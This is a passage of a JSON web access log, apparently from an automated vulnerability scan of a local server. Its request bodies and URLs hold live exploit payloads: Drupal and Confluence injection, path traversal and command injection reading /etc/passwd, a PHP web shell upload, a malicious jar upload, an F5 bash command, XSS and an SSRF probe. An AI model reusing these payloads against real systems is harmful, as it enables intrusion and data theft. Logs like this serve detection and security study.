HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#post_render][]\x22\x0D\x0A\x0D\x0Apassthru\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#type]\x22\x0D\x0A\x0D\x0Amarkup\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#markup]\x22\x0D\x0A\x0D\x0Acat /etc/passwd\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22form_id\x22\x0D\x0A\x0D\x0Auser_register_form\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22_drupal_ajax\x22\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"127.0.0.1/user/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.184","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shindig/gadgets/proxy?container=default&url=http://oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.170","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/doenterpagevariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapi/v1/system/accountmanage/account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/hana/xs/formLogin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/database/pme/phinx.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F297MTxeEp2EBGeybedUifFgKKb7.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MTuK0OTRdtAAX5pWtaQ0byCX.jar\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0APK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00META-INF/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xF3M\xCC\xCBLK-.\xD1\x0DK-*\xCE\xCC\xCF\xB3R0\xD43\xE0\xE5r,J\xCE\xC8,K-B\x08\x07\xE4\xA4V\x94\x16+\xC0$x\xB9\x9CJ3sJt\x9D*\xAD\x14RRRx\xB9\x9C\x8BR\x13KRS\xC0\x02\x8E\x05\x89\xC9\x19\xA9\x0A\xBE\x89e\xA9y\x0A\xC6z\x16z\x86\x10\xE5)\xBA^)\xD9 \x1B,\xF4\x0C\xE2\x8D\x0D\x81\xA2\xBC\x5C\x00PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00Evil.class}T\xD9Z\xD3@\x18=\xD3mJ\x08\x14\xCB\x22\xB8\xE3Z\x14\xA8\x0B\x88R\xC4\x05Q\xAB- \x15$\xE2\x96\xA6#\x04\xDA\x04\xD3\xC4O\x9F\x88[\xBD\x01\x94O/\xBD\xF0Y|\x06\xF1\x9F\xB4B\x0B\xFD\xCC\xC5$s\xCE\xBF\x9E\xFC3\xBF\xFE|\xFB\x01`\x08y\x05\x871\xC2qCA\x00#\x0Anb\x94#\x15\xC5X\x14\xB7\xE4n\x9C\xE36\xC7\x1D\x05wqO\x81\x82\x09\x05M\xB8\x1F\xC5\xA4|?h\xC6C<\x92_i\x8E\xC7\x0A\xE2x\x12EFA\x18Y\x8E)\x8Ei\x86\xC8\x98i\x99\xEE8C0\xD17\xCF\x10\x9A\xB0\x0B\x82!\x961-1\xE5\x95\xF2\xC2y\xA6\xE7\x8B\x84\xC43\xB6\xA1\x17\xE7u\xC7\x94\xFB*\x18r\x97\xCD2\xC5\xC8L~0\x8B)\x06\xD5\xF0\xCA\xAE]\xCA\x0Aw\xD9.0\x9COdV\xF4\x0Fz\xB2\xA8[K\xC9\x9C\xEB\x98\xD6R\xAA\xEF Dq\xC4Ga0\xB4\xD7p3\x8Em\x88r\x99\xC8\xD6\xBC\xF7\xEE\x9DpDaV\xE8\x05\xE10tW\xCCL;y\xAF\x8E\x91\x81\x8AT\xB7,\xB6A\x12FD\xE7\xAEkzz\xF2\xA3!\xD6\x5C\xD3\xB6\x88\x0B\x1A%\xAA7\xE2\x88\xB2Wt\x19\xDA*f\x9Ek\x16\x93\x19\xB3\xEC\x92EW}\xFF\x9F\xD6\xFEipv\x9F\xED\xD8\xC1\xDC\xE3\xE4\xDF\x92suc5\xAB\xAF\xF9n\xBE\xFA)\x8E\x19\x8E\xA7\xFE\x0F|\xCC\xA0\xE4l\xCF1\xC4\x03SFm\x92\x8A\x0E\xCAH*\xBA\xD1C\xDA\xECe\xB9\xEB8\xFA'\x99\x8AcVE\x0E\xCF\xA8\xE0\xFD9\x19x2oZ\xC9\xF22C`\xC0P\xD1\x8B9j\xA2\xB1p\x0C=\xBB\xB2Xk\x9EK!\x84^\xAApT\xA0\x8Ay<\x97e,\xC8Ec\x80\x8A\x17X\xA4\xEAU\xBC\xC4+\x15\xAF\xF7\x0A\xACWV\xC5\x1B,\x92\xF2\x8A\x8A\xB7\xD0\xE9\xF7\xC8\xAE\xEA\xAA\x9D\xCE\xAF\x08\x83\x14o\xAD\x17\x91\xE1\xD0\x81Q\xA8\xC3f=\xCB5K$\x94\xB2$\xDC\xDDMg\xA2v\xBC\xAA0\x89\x9FH,\xFE\x7F\x12k\xA6\x8D\xE2\xD5\x88\xC0p\xF8_\xCCzu\xC8\xB4;\xD1\x90\x90\xC7\xA8}\x8F\xAA\xCE\xA6D\xA3\xC4\x172\xFE\x84v$\x1A\x1E\x84\xA0^(\xC862\xFB\x15J\xF5\xBD`\x08\x1BE\xBB\x5C\xED9K\xE5\xEAK\xF2\x0C\xAE\xD8\xA6\xC5p\xA7\xD6gbYwr\xE2\xBD',C\xA4j\xF0\xB4+\x1C9~\x8DN!MH\x17]5\xF2\x09\x80\xC9\xA1\xA3\xF5\x08\xED\x92\xF4\xA6\x7F\x8E\xF0\xC5M\xB0/>}\x94\xD6\x88\x0Fr\x1C\x83\x9C\x07\xDF\x00\xC7q\x82\xDE\x0C'q\xAA\xE2\xCC\xD2\x84F\x08[\xDDF@\xDBD0\xBB\x85P\xE4;\xC2Z0\x1E\xC9i\xA18\xCFi\xE1K\xB9\x0DD\xA7\xB6\xD1\xA4mC\xD1\x066\xD0\xBC\x09u\x13-\xA3\xA1x\xEBh\xB8'\xB4\x81\x986\x1A\xFE\x89X\x7FO\xF8+\xDA\x02x\xBE\xBE\xF3[\xC2\x87\xD6\x11\x9B\xEA'\x87\xF6\x0A\x1C\xEF\xE8\xDFB\xE7gJ\x1D\xC5\x1C\x16\xE8\xBA\x0B\xF9\xA5\x0E\xA2\x99V\x85Py\x0EZ0\x8CV\xBA9c\xB8\x8F6\xCC\x90\xD5\x1Cu\xBE\x80\x0Eh\xE8D\x814\x90-=\xA2\xD6z\xE9\xFE\xED\xC5i\x04\xC9\xE3\x14\xCE\xE0,\xC5\xBBI\xEC9\x9C\xA7\xB64\x8Az\x01\x09b\xA9\xBDj\xEB\xF2\xAB\x8FXY\x81\x81\x8B\xB8Db\xF5W\x05\xAA \x03\x84\x0C\x12r\x19\xA1\x1D\x0A\x16\xE1Hr\x5C\xE6\xB8\xC2q\x95\xE3\x1A}\x03];\x94<\xB8\xCB\x80q\x0C5S\x84a_\xFC\xEB\x7F\x01PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00META-INF/maven/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00META-INF/maven/org.example/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00META-INF/maven/org.example/eviljar/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00META-INF/maven/org.example/eviljar/pom.xml\x85RMo\xC2 \x18\xBE\xF7W4\xBD\x17\xEA\xB6\x83i\x10\xB3\xCB\xB2%:M\xEA\x96]\x09}W1-\x10\xC0\xB6?\x7F\x0C\xD4\xD4D#\xB7\xF7\xF9x?\x9E@\x96c\xD7\xA6=\x18+\x94\x5Cd3Td)H\xAEj!\x9BE\xF6\xB5{\xCB\xE7\xD9\x92&D\x1Bu\x00\xEER\xAF\x96v\x91\xED\x9D\xD3%\xC6\x1D\xEBA\x22\xA6\x19\xDF\x03R\xA6\xC1\xDB\xCD\x1A\xBF\xA0\xC2wI\xD2\xF3\x0B\x96r\xB4\xE2b\x1B\x86\x01\x0D\xCF\xC1\xF0T\x143\xFC\xB3^U\xBEC\xC7r!\xADc\x92\xC3\xD4nEi\x03\xBBR\x9C\xB9\xB0\xE6\xC3\xF1\xE9=\xC5h\xEB\x08\xE6A\x87|\x9D\xD10\x8Ct\xAA\x86\xF6;&A\x03K\xF0\x15\x96D]c\xD4Q\x7F\xD4\xD4\xB7C0\xB2N\xB7@\xF0\x19\x8C\x12f\x9C\xF8e\xDCy\x00z\xD1\x1E\x98!x\x82E\xD1)t\xEA3\xCF\xAB\xCF\xD7m\xF5\xBE\xD9\x11\xDC_\x0F\xF3\xB9k\xF0N\xB0\xF4\x12\x09\x89Wq\xD5i\xD1\x82AV\x1D\x0D\x07:'\xF86q\xD7\xE8\x98i\xC0\xDD0\x9E\x88\xB8\x02\x9E\xEE\x90\x84\xF2\xFF+\xD0?PK\x03\x04\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00META-INF/maven/org.example/eviljar/pom.properties\x0D\xC8K\x0A\xC20\x10\x00\xD0\xFD\xC0\xDCa\xA0kK\x92\x8DX\xE8B\x04\x7F\xE0\x07\xD2\x0B\x8CvZ\x225)c\x0Cz{}\xCBW\xED$\x8Ar\x96\x9En_:q\x91\x88Pm5\xD0\x91#\x99%\x99Ucm\xE3\x0Cm|G\xCE8\x87PD_!\xC5\xD6\xD6f\xE1\xCF\xEB\xAB\xDF_:\x84Q\xD3{>\xF4m\xD2\xB1\x96\x0F?\xE7I\x10Xs\x18\xF8\x9E\xFF/%L\x0FV\x84\x1FPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xEDA\x00\x00\x00\x00META-INF/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81'\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xC3\x00\x00\x00Evil.classPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFI\x04\x00\x00META-INF/maven/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFv\x04\x00\x00META-INF/maven/org.example/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFF\xAF\x04\x00\x00META-INF/maven/org.example/eviljar/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xF0\x04\x00\x00META-INF/maven/org.example/eviljar/pom.xmlPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81N\x06\x00\x00META-INF/maven/org.example/eviljar/pom.propertiesPK\x05\x06\x00\x00\x00\x00\x08\x00\x08\x00?\x02\x00\x00\x10\x07\x00\x00\x00\x00\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22request\x22; filename=\x22blob\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0Anull\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"{\x22entry\x22:\x22Evil\x22,\x22request\x22:\x22id\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/customMethod HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.163","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"errorpage=/etc/passwd&obj-action=auth&:action=login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/webproc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.163","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 